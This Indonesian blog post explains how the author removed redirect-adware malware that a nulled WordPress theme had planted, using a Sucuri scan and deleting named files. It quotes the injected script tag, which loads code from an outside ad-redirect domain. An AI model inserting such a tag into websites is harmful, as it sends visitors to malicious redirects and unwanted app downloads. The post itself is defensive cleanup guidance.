Cara Membersihkan Website Dari Malware
Cara Membersihkan Website Dari Malware

√ Cara Membersihkan Website dari Malware di WordPress

Cara Membersihkan Website dari Malware – Rentang dua hari yang lalu kami sempat dikejutkan dengan adanya iklan yang nongol di salahsatu website yang umurnya baru 1 minggu. Padahal sebelumnya belum pernah kasih kode iklan dari situs advertiser manapun.

Parahnya iklan tersebut muncul ketika di akses melalui smartphone dengan terbukanya tab baru lalu redirect ke situs tidak jelas lalu endingnya disuruh download aplikasi di playstore.

Sebelumnya kami mengira kalau itu hanya iklan bawaan operator yang hanya muncul sekali saja, tapi ternyata salah. Beberapa kali muncul di tidap-tiap halaman yang berbeda, jadi jengkel sendiri jadinya. Anehnya jika diakses melalui dekstop iklannya hilang entah pergi kemana.

Setelah itu admin coba cek di situs https://sitecheck.sucuri.net dan hasilnya diluar dugaan, website tersebut terkena serangan malware. Dan ada file inject di script dibawah ini.

<script type=”text/javascript” src=”//ofgogoatan.com/apu.php?zoneid=3280383″ async data-cfasync=”false”></script>

Permasalahan malware ini terjadi karena kami mengunduh theme tidak resmi (nulled) yang bertebaran di internet dan di instal di website tersebut. Iya emang selain gratis, juga bisa menikmati semua keunggulan theme seperti halnya di versi berbayar. Tetapi yang ada theme tersebut di susupi oleh malware dan yang terkena imbas adalah websitenya.

Nah bagi kalian yang juga mengalami kejadian seperti kami diatas tapi tidak menemukan solusinya jangan panik dan jangan buru-buru instal ulang website. Karena dibawah ini akan kami share bagaimana cara mengatasi website terkena malware redirect tersebut.

Cara Membersihkan Website dari Malware dengan Mudah

  • Pertama, silahkan hapus plugin atau theme yang tidak asli.
  • Setelah itu silahkan Login ke Direct Admin di penyedia hostingLogin Ke Direct Admin
  • Lalu pilih File ManagerFile Manager
  • Setelah itu klik Domains di sebelah kiri.Domains
  • Kemudian pada kolom pencarian silahkan cari monit.phpMonit
  • Setelah itu centang pada monit.php lalu klik DeleteDelete Files
  • Lalu cari lagi file admin_ips.txt
  • Setelah itu hapus seperti langkah sebelumnya.Admin Ips
  • Lalu cari lagi file current-tag.min.js lalu hapusCurrent Tag.min.js
  • Kemudian tunggu waktu 1×24 jam dan cek lagi disitus sucuri
  • Tara, statusnya akan berganti menjadi No Malware FoundNo Malware Found
  • Selesai

Mudah bukan? Pastinya malware iklan inject tersebut akan enyah dan tidak akan lagi mengganggu. Jadi usahakan lebih berhati-hati dalam menggunakan plugin atau theme ilegal supaya kejadian ini tidak terulang.

Jika dirasa ada kesulitan dari cara diatas bisa tuliskan pada kolom komentar dibawah ya. Semoga ulasan kami mengenai Cara Menghilangkan Malware di WordPress paling ampuh, baca juga Cara Parse Convert Kode HTML di artikel sebelumnya.

Review Artikel

Rating

Rating Artikel

User Rating: 5 ( 2 votes)

Tinggalkan Balasan

Alamat email Anda tidak akan dipublikasikan.